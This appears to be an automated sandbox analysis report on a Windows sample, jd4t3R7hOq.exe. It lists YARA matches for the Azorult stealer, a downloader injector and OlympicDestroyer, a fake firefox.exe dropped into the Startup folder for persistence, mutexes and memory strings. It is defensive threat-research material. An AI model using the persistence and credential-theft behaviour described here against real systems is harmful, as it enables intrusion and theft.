Source: svchost.exe, 00000008.00000003.1314507742.000002CE4FE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000E.00000002.1461318819.0000000004A42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf
Source: jd4t3R7hOq.exe, 00000007.00000002.1425800940.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf4
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001585000.00000004.00000020.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1425800940.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: jd4t3R7hOq.exe, 00000007.00000002.1425800940.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.s
Source: jd4t3R7hOq.exe, 00000007.00000002.1425800940.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001585000.00000004.00000020.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1423629865.000000000156B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: jd4t3R7hOq.exe, 00000007.00000002.1425800940.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfZfile://192.168.2.1/all/install/setup.au3_
Source: powershell.exe, 00000005.00000002.1320279649.000000000599B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1479196509.000000000595A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr, mozglue.dll.7.dr, freebl3.dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.firefox.exe.4cd0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.firefox.exe.4cd0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 3.2.jd4t3R7hOq.exe.3554ea0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 3.2.jd4t3R7hOq.exe.3552660.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 11.2.firefox.exe.26a5cfc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 11.2.firefox.exe.26a34bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 7.2.jd4t3R7hOq.exe.46644cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.2.jd4t3R7hOq.exe.4668c37.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 7.2.jd4t3R7hOq.exe.466d39f.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2552789436.0000000004CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_01A8D304	3_2_01A8D304
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06682100	3_2_06682100
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_0668E820	3_2_0668E820
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06683008	3_2_06683008
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Code function: 11_2_00A6D304	11_2_00A6D304
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Code function: 11_2_06F1E820	11_2_06F1E820
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Code function: 11_2_06F12100	11_2_06F12100
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Code function: 11_2_06F13008	11_2_06F13008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_02CF7B08	14_2_02CF7B08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_02CF79B8	14_2_02CF79B8

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: String function: 004034E4 appears 36 times

Source: api-ms-win-core-profile-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.7.dr	Static PE information: No import functions for PE file found

Source: jd4t3R7hOq.exe, 00000003.00000002.2534600317.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000003.00000000.1287456263.0000000001012000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000003.00000002.2531184720.000000000162E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000003.00000002.2554670589.0000000005B00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1433821446.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs jd4t3R7hOq.exe
Source: jd4t3R7hOq.exe	Binary or memory string: OriginalFilenamefirefox.exe0 vs jd4t3R7hOq.exe

Source: jd4t3R7hOq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.firefox.exe.4cd0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.jd4t3R7hOq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.jd4t3R7hOq.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.firefox.exe.4cd0000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.jd4t3R7hOq.exe.43f3b70.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 3.2.jd4t3R7hOq.exe.3554ea0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 3.2.jd4t3R7hOq.exe.3552660.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 11.2.firefox.exe.26a5cfc.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 11.2.firefox.exe.26a34bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 7.2.jd4t3R7hOq.exe.46644cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.2.jd4t3R7hOq.exe.4668c37.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.2.jd4t3R7hOq.exe.466d39f.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2552789436.0000000004CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000003.00000002.2548061151.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Source: jd4t3R7hOq.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: firefox.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.phis.troj.adwa.spyw.evad.winEXE@18/60@1/2

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,

7_2_00416B94

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_0040A4A4 CoCreateInstance,

7_2_0040A4A4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-B81A448A-A079C5D3-DD4772ED
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Mutant created: \Sessions\1\BaseNamedObjects\UFA7A44E6-9414907A-B81A448A-A079C5D3-DD4772ED
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmpr5emy.fem.ps1

Jump to behavior

Source: jd4t3R7hOq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jd4t3R7hOq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
